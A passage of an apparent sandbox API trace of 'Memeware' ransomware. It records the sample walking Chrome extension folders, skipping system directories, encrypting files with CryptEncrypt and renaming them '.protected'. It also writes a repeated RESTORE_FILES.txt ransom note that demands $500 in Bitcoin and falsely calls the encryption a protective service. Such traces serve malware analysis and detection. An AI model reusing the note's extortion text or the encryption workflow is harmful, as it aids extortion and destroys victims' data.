lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.928] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0079.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.928] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0079.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.928] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0079.928] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2769, lpOverlapped=0x0) returned 1 [0079.936] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd897, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.936] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2769, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2769, lpOverlapped=0x0) returned 1 [0079.936] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.936] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.936] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.936] CloseHandle (hObject=0x164) returned 1 [0079.937] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.protected") returned 174 [0079.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.protected")) returned 1 [0079.937] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.937] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.937] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\RESTORE_FILES.txt") returned 159 [0079.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.938] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.938] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.939] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.939] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.939] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.939] CloseHandle (hObject=0x160) returned 1 [0079.939] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0079.939] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0079.939] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\RESTORE_FILES.txt") returned 149 [0079.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0079.939] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.939] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0079.940] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.940] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0079.940] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.940] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0079.940] CloseHandle (hObject=0x15c) returned 1 [0079.941] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0079.941] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0079.942] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\RESTORE_FILES.txt") returned 141 [0079.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0079.942] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.942] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0079.943] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.943] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0079.943] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.943] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0079.943] CloseHandle (hObject=0x158) returned 1 [0079.943] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="Windows") returned -1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="Program Files") returned -1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="Program Files (x86)") returned -1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="$Recycle.bin") returned 1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="System Volume Information") returned -1 [0079.943] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap") returned 123 [0079.944] lstrcmpW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2=".") returned 1 [0079.944] lstrcmpW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="..") returned 1 [0079.944] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*") returned 125 [0079.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0079.948] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.948] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.948] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.948] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.948] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\.") returned 125 [0079.948] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.948] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.948] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.948] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.948] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.948] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.948] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\..") returned 126 [0079.948] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.948] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.948] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="Windows") returned -1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="Program Files") returned -1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="Program Files (x86)") returned -1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="$Recycle.bin") returned 1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="System Volume Information") returned -1 [0079.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0") returned 129 [0079.948] lstrcmpW (lpString1="1.1_0", lpString2=".") returned 1 [0079.948] lstrcmpW (lpString1="1.1_0", lpString2="..") returned 1 [0079.948] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*") returned 131 [0079.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0079.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.958] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.958] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.958] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.958] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\.") returned 131 [0079.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.958] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.959] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.959] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.959] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.959] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\..") returned 132 [0079.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.959] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="Windows") returned -1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0079.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.959] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0079.959] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.959] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.959] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.960] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.960] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0079.960] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.960] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0079.960] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.960] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0079.960] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xd47, lpOverlapped=0x0) returned 1 [0079.971] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff2b9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.971] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xd47, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: 